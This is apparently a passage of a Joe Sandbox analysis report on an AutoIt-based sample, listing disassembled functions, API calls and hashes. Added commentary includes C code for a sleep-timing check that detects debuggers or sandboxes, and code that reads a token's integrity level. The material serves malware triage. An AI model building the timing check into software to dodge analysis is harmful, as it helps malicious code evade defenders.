                                            • Opcode Fuzzy Hash: 7f02c60288fe0eecb7563531b8ab3beab03b03e63855a5f7a1bdd1d6c3cc25cb
                                            • Instruction Fuzzy Hash: BF011D71645204FFDB204FA6ED88D6B7BADFF89795720057BF849E2260DA319D04CAA0
                                            APIs
                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E75502
                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E75510
                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E75518
                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E75522
                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E7555E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                            • String ID:
                                            • API String ID: 2833360925-0
                                            • Opcode ID: 91d2d36edf9264c385aa211dcc782f22dc7bfa07867ea814fdeba99f36b1bebd
                                            • Instruction ID: 56fc7e18cfc5377dbe80fc58b9870261ff5370c9a3e10621742bcb09bbd3791b
                                            • Opcode Fuzzy Hash: 91d2d36edf9264c385aa211dcc782f22dc7bfa07867ea814fdeba99f36b1bebd
                                            • Instruction Fuzzy Hash: 57015732C01A29DBCF00EFEAE888AEDBB79FB09701F004157E905F2141DB709658C7A1
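The function above strings QueryPerformanceCounter, QueryPerformanceFrequency and Sleep together, which is exactly the API pairing the report's "execution timing" signature keys on. The block below is an added example, not code from the sample or from Joe Sandbox: it implements the measure-sleep-measure pattern and the plausibility check a debugger- or sandbox-aware sample applies to the result. The thresholds (under half the requested delay means Sleep was skipped, over fifty times means execution was stalled) are assumptions chosen for illustration. On Windows it calls the listed APIs; elsewhere it falls back to clock_gettime()/nanosleep() so it builds anywhere.

```c
/* Added example (not the sample's or the report's code): the
 * counter / sleep / counter timing pattern and the check applied to it.
 * Thresholds in classify_delay() are illustrative assumptions. */
#define _POSIX_C_SOURCE 200809L
#include <stdint.h>
#include <stdio.h>

#ifdef _WIN32
#include <windows.h>
/* Same APIs as the listed function: QueryPerformanceFrequency/Counter. */
static uint64_t now_us(void) {
    LARGE_INTEGER c, f;
    QueryPerformanceFrequency(&f);
    QueryPerformanceCounter(&c);
    return (uint64_t)c.QuadPart * 1000000ULL / (uint64_t)f.QuadPart;
}
static void sleep_ms(unsigned ms) { Sleep(ms); }
#else
#include <time.h>
/* Portable fallback so the example compiles off Windows. */
static uint64_t now_us(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000ULL + (uint64_t)ts.tv_nsec / 1000ULL;
}
static void sleep_ms(unsigned ms) {
    struct timespec ts = { (time_t)(ms / 1000), (long)(ms % 1000) * 1000000L };
    nanosleep(&ts, NULL);
}
#endif

enum timing_verdict {
    TIMING_NORMAL = 0,        /* delay is roughly what was asked for      */
    TIMING_SLEEP_SKIPPED = 1, /* far too short: Sleep() patched/accelerated */
    TIMING_STALLED = 2        /* far too long: single-stepping/breakpoint  */
};

/* Compare a measured delay with the requested one. A sandbox that patches
 * Sleep() to return immediately yields elapsed << requested; a debugger
 * stepping across the call yields elapsed >> requested. */
enum timing_verdict classify_delay(uint64_t requested_us, uint64_t elapsed_us) {
    if (elapsed_us < requested_us / 2)  return TIMING_SLEEP_SKIPPED;
    if (elapsed_us > requested_us * 50) return TIMING_STALLED;
    return TIMING_NORMAL;
}

/* One measurement in the order the listing shows: counter, sleep, counter.
 * Returns elapsed microseconds; the verdict is written to *verdict. */
uint64_t measure_sleep(unsigned ms, enum timing_verdict *verdict) {
    uint64_t t0 = now_us();
    sleep_ms(ms);
    uint64_t elapsed = now_us() - t0;
    if (verdict) *verdict = classify_delay((uint64_t)ms * 1000ULL, elapsed);
    return elapsed;
}

int main(void) {
    enum timing_verdict v;
    uint64_t el = measure_sleep(20, &v);
    printf("requested 20000 us, elapsed %llu us, verdict %d\n",
           (unsigned long long)el, (int)v);
    return 0;
}
```

The same three calls are also what any high-resolution sleep helper looks like (this memory region carries the AutoIt runtime's own GUI code, as the AutoIt3GUI string further down shows), so the signature by itself is a weak indicator; weigh it alongside the injection and credential-access behaviours the report lists rather than on its own.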
                                            APIs
                                            • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E6758C,80070057,?,?,?,00E6799D), ref: 00E6766F
                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E6758C,80070057,?,?), ref: 00E6768A
                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E6758C,80070057,?,?), ref: 00E67698
                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E6758C,80070057,?), ref: 00E676A8
                                            • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E6758C,80070057,?,?), ref: 00E676B4
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                            • String ID:
                                            • API String ID: 3897988419-0
                                            • Opcode ID: 11165b1afce2e670649bdbaa38d789489fd7b00e875d5ba2a3b3d838c12a60eb
                                            • Instruction ID: f5711feb05b297c632261f8e7ac8e6d9191fce78bdb05a7cbce6376d5a940917
                                            • Opcode Fuzzy Hash: 11165b1afce2e670649bdbaa38d789489fd7b00e875d5ba2a3b3d838c12a60eb
                                            • Instruction Fuzzy Hash: 4501D4B2600604BFDB108F19EC08BAE7FACEB44B95F10012AFD45E2211EB71DD5087A0
                                            APIs
                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E68608
                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E68612
                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E68621
                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E68628
                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E6863E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                            • String ID:
                                            • API String ID: 44706859-0
                                            • Opcode ID: ecbae172079a541ad91c58507c3acb3853e721e68b1e44643fe502bd238c97c1
                                            • Instruction ID: bfca52133d5308290287f1169acfe771d73ec33b009d83293a82804efb241371
                                            • Opcode Fuzzy Hash: ecbae172079a541ad91c58507c3acb3853e721e68b1e44643fe502bd238c97c1
                                            • Instruction Fuzzy Hash: 80F06231241204BFEB100FA6ED8DE6F3BACEF89798B105627F945E6160CB71DC45DA60
                                            APIs
                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E68669
                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E68673
                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E68682
                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E68689
                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E6869F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                            • String ID:
                                            • API String ID: 44706859-0
                                            • Opcode ID: a6efae7c42652476bda466bc2a52ca0a437370b079fd8e1485c6701292f3b1f0
                                            • Instruction ID: bbdb81d9742324c2f926d41ba1077eba83280deceb4fd6747a7efbb2d659b935
                                            • Opcode Fuzzy Hash: a6efae7c42652476bda466bc2a52ca0a437370b079fd8e1485c6701292f3b1f0
                                            • Instruction Fuzzy Hash: FAF06271241304BFEB111FA6EC89E6B3BACEF89798B100137F945E6150CB71DD45DA60
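The two GetTokenInformation functions above (TokenGroups, then TokenIntegrityLevel), like the GetUserObjectSecurity function earlier, follow the same two-call idiom: query with a NULL buffer, expect GetLastError to report an insufficient buffer, allocate the reported size from the process heap (the 00000008 visible in the listing is consistent with HEAP_ZERO_MEMORY), then query again. The block below is an added example, not the sample's or Joe Sandbox's code: it carries that idiom through for the integrity level under _WIN32, and decodes the S-1-16-RID mandatory-label SID the second call returns with a portable parser so the decoding can be built and tested anywhere. The SID bytes embedded in it are constructed test data, not taken from the sample.

```c
/* Added example (not the sample's or the report's code): the two-call
 * GetTokenInformation() idiom from the listing plus a portable decoder for
 * the TOKEN_MANDATORY_LABEL SID it returns (S-1-16-<RID>).
 * SAMPLE_MEDIUM_SID is constructed test data. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Integrity RIDs as documented for the SECURITY_MANDATORY_*_RID constants. */
#define RID_LOW    0x1000u
#define RID_MEDIUM 0x2000u
#define RID_HIGH   0x3000u
#define RID_SYSTEM 0x4000u

/* Decode the last sub-authority of a SID under identifier authority 16
 * (SECURITY_MANDATORY_LABEL_AUTHORITY). Layout: revision(1),
 * sub-authority count(1), authority(6, big-endian), then 4-byte
 * little-endian sub-authorities. Returns 0 and fills *rid, or -1 if the
 * bytes are malformed or not a mandatory-label SID. */
int integrity_rid_from_sid(const uint8_t *sid, size_t len, uint32_t *rid) {
    if (!sid || !rid || len < 8) return -1;
    uint8_t revision = sid[0], count = sid[1];
    if (revision != 1 || count == 0 || count > 15) return -1;
    if (len < 8 + (size_t)count * 4) return -1;
    uint64_t authority = 0;
    for (int i = 0; i < 6; i++) authority = (authority << 8) | sid[2 + i];
    if (authority != 16) return -1;
    const uint8_t *p = sid + 8 + (size_t)(count - 1) * 4;
    *rid = (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
    return 0;
}

/* Map a mandatory-label RID to the level name Windows uses. */
const char *integrity_name(uint32_t rid) {
    if (rid < RID_LOW)    return "Untrusted";
    if (rid < RID_MEDIUM) return "Low";
    if (rid < RID_HIGH)   return "Medium";
    if (rid < RID_SYSTEM) return "High";
    return "System";
}

#ifdef _WIN32
#include <windows.h>
/* The idiom from the listing: size query, ERROR_INSUFFICIENT_BUFFER,
 * GetProcessHeap()/HeapAlloc(), second query. Returns the RID, or
 * 0xFFFFFFFF when the token cannot be read. */
uint32_t current_process_integrity(void) {
    HANDLE tok;
    DWORD need = 0;
    uint32_t rid = 0xFFFFFFFFu;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &tok)) return rid;
    GetTokenInformation(tok, TokenIntegrityLevel, NULL, 0, &need);
    if (GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
        TOKEN_MANDATORY_LABEL *lbl = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, need);
        if (lbl && GetTokenInformation(tok, TokenIntegrityLevel, lbl, need, &need))
            integrity_rid_from_sid((const uint8_t *)lbl->Label.Sid,
                                   GetLengthSid(lbl->Label.Sid), &rid);
        if (lbl) HeapFree(GetProcessHeap(), 0, lbl);
    }
    CloseHandle(tok);
    return rid;
}
#endif

/* Constructed sample: S-1-16-8192, i.e. Medium integrity. */
static const uint8_t SAMPLE_MEDIUM_SID[] = {
    0x01, 0x01,                          /* revision 1, one sub-authority */
    0x00, 0x00, 0x00, 0x00, 0x00, 0x10,  /* authority 16, big-endian      */
    0x00, 0x20, 0x00, 0x00               /* 0x2000 little-endian          */
};

int main(void) {
    uint32_t rid;
    if (integrity_rid_from_sid(SAMPLE_MEDIUM_SID, sizeof SAMPLE_MEDIUM_SID, &rid) == 0)
        printf("S-1-16-%u -> %s\n", rid, integrity_name(rid));
#ifdef _WIN32
    rid = current_process_integrity();
    printf("this process: S-1-16-%u -> %s\n", rid, integrity_name(rid));
#endif
    return 0;
}
```

When triaging, the interesting question is not that the runtime can read its integrity level but what the script does with the answer; a Medium result feeding a later elevation attempt is the pattern to look for in the script-level behaviour, not in this helper.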
                                            APIs
                                            • GetDlgItem.USER32(?,000003E9), ref: 00E6C6BA
                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E6C6D1
                                            • MessageBeep.USER32(00000000), ref: 00E6C6E9
                                            • KillTimer.USER32(?,0000040A), ref: 00E6C705
                                            • EndDialog.USER32(?,00000001), ref: 00E6C71F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                            • String ID:
                                            • API String ID: 3741023627-0
                                            • Opcode ID: 37023e1d9dec15a9aae7937b092d0743ada1afa7f6d456b326f82a9c256e9520
                                            • Instruction ID: 14ed3fd54b120c6ca49ce92cf40639090cb92f6da18a9df941a0a7bc6f9bef5b
                                            • Opcode Fuzzy Hash: 37023e1d9dec15a9aae7937b092d0743ada1afa7f6d456b326f82a9c256e9520
                                            • Instruction Fuzzy Hash: C101A270540304ABEB205B21EC4EFA677B8FF04B45F04166BF582F10E1DBE4A9588F80
                                            APIs
                                            • EndPath.GDI32(?), ref: 00E113BF
                                            • StrokeAndFillPath.GDI32(?,?,00E4BAD8,00000000,?), ref: 00E113DB
                                            • SelectObject.GDI32(?,00000000), ref: 00E113EE
                                            • DeleteObject.GDI32 ref: 00E11401
                                            • StrokePath.GDI32(?), ref: 00E1141C
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                            • String ID:
                                            • API String ID: 2625713937-0
                                            • Opcode ID: 9e2cfc0a2e88a0b1b5d35e01fdc24cae71d154688cc596695395432fcba95720
                                            • Instruction ID: ad0a02ed36bcd50fa503340e18d2ad3ba5d3573b4120a66faae990d4668d7336
                                            • Opcode Fuzzy Hash: 9e2cfc0a2e88a0b1b5d35e01fdc24cae71d154688cc596695395432fcba95720
                                            • Instruction Fuzzy Hash: 0BF0C934006308EFDB195F67FC0D7983BA8E701726F149267E529A50F1C73159A9EF50
                                            APIs
                                            • CoInitialize.OLE32(00000000), ref: 00E7C69D
                                            • CoCreateInstance.OLE32(00EA2D6C,00000000,00000001,00EA2BDC,?), ref: 00E7C6B5
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                            • CoUninitialize.OLE32 ref: 00E7C922
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                            • String ID: .lnk
                                            • API String ID: 2683427295-24824748
                                            • Opcode ID: a4b7b0fcd93df21134f2e7b1536bf12866fdbce9cf44ee253a2a47fc7bae56b9
                                            • Instruction ID: 5c7cd7df8e5fb53d7dc624a379085fdb54d9ce293ccc5d93d39786bd24b909e1
                                            • Opcode Fuzzy Hash: a4b7b0fcd93df21134f2e7b1536bf12866fdbce9cf44ee253a2a47fc7bae56b9
                                            • Instruction Fuzzy Hash: 72A11D71208305AFD700EF64C891EABB7ECEF98704F00595DF196A7192DB71EA89CB52
                                            APIs
                                              • Part of subcall function 00E30FF6: std::exception::exception.LIBCMT ref: 00E3102C
                                              • Part of subcall function 00E30FF6: __CxxThrowException@8.LIBCMT ref: 00E31041
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                              • Part of subcall function 00E17BB1: _memmove.LIBCMT ref: 00E17C0B
                                            • __swprintf.LIBCMT ref: 00E2302D
                                            Strings
                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E22EC6
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                            • API String ID: 1943609520-557222456
                                            • Opcode ID: e515429e6c458fda1ca9d4a49c37321eeae24644c7628412004f69e26b6a51f3
                                            • Instruction ID: 608bc03c51c3f4b2f05fa7a4c8e688b61a7ecfde0625b4b68fc8be92fa858e0e
                                            • Opcode Fuzzy Hash: e515429e6c458fda1ca9d4a49c37321eeae24644c7628412004f69e26b6a51f3
                                            • Instruction Fuzzy Hash: 84917F716083119FC718EF24D895CAEB7F5EF85740F00291DF886A72A1DB20EE84CB62
                                            APIs
                                              • Part of subcall function 00E148AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E148A1,?,?,00E137C0,?), ref: 00E148CE
                                            • CoInitialize.OLE32(00000000), ref: 00E7BC26
                                            • CoCreateInstance.OLE32(00EA2D6C,00000000,00000001,00EA2BDC,?), ref: 00E7BC3F
                                            • CoUninitialize.OLE32 ref: 00E7BC5C
                                              • Part of subcall function 00E19997: __itow.LIBCMT ref: 00E199C2
                                              • Part of subcall function 00E19997: __swprintf.LIBCMT ref: 00E19A0C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                            • String ID: .lnk
                                            • API String ID: 2126378814-24824748
                                            • Opcode ID: a0006f3bd99daf392cd4e6a8b86227f9a665701733ddc51fdc992f0457914e23
                                            • Instruction ID: 1af9b24efeeceb874705bfc9d45da3782900974cbe637251b933edc50fde93b3
                                            • Opcode Fuzzy Hash: a0006f3bd99daf392cd4e6a8b86227f9a665701733ddc51fdc992f0457914e23
                                            • Instruction Fuzzy Hash: 87A179712043019FCB14DF14C494E9ABBE5FF88318F149988F89AAB3A2CB31ED45CB91
                                            APIs
                                            • OleSetContainedObject.OLE32(?,00000001), ref: 00E6B981
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ContainedObject
                                            • String ID: AutoIt3GUI$Container$%
                                            • API String ID: 3565006973-1286912533
                                            • Opcode ID: 020fba365fa5775938318e5b1f2563a21bdd3add0389a17afb0535a72bb5df25
                                            • Instruction ID: 5db66a518edcbd79cfd0d8462db8cee03558df6a410b19efc8d4f9e95655df7a
                                            • Opcode Fuzzy Hash: 020fba365fa5775938318e5b1f2563a21bdd3add0389a17afb0535a72bb5df25
                                            • Instruction Fuzzy Hash: 70916A706402019FDB24CF68D885B6ABBF8FF48750F14956EF94AEB291DB71E881CB50
                                            APIs
                                            • __startOneArgErrorHandling.LIBCMT ref: 00E352DD
                                              • Part of subcall function 00E40340: __87except.LIBCMT ref: 00E4037B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ErrorHandling__87except__start
                                            • String ID: pow
                                            • API String ID: 2905807303-2276729525
                                            • Opcode ID: 2ae1d2f360180d961b322be8f5c7353b8047a2f26d0e88796a9d9a105add2305
                                            • Instruction ID: 024e6d107c70f0f85c30b4d993ee0a8bf9c7a92ec093204e0f5b2ab60a7e1bc7
                                            • Opcode Fuzzy Hash: 2ae1d2f360180d961b322be8f5c7353b8047a2f26d0e88796a9d9a105add2305
                                            • Instruction Fuzzy Hash: 4D516A32A0D6018BC711BB15E9053BA6FE09B40754F206D78E6E5723EAEE748DC8DA42
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #$+
                                            • API String ID: 0-2552117581
                                            • Opcode ID: d80d57414959b5d70d205ee83bf1de0e4dda5a9ecb847ead4617d83002296778
                                            • Instruction ID: 42bad8cb80f9f4f44fcef4af3e152e4cc2094fb6537e57d1fb29142598bc9133
                                            • Opcode Fuzzy Hash: d80d57414959b5d70d205ee83bf1de0e4dda5a9ecb847ead4617d83002296778
                                            • Instruction Fuzzy Hash: 4F513176244246CFDF15DF28D898AFB7BA4EF16314F182056E891BB2E1C7309C86CB60
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memmove$_free
                                            • String ID: Oa
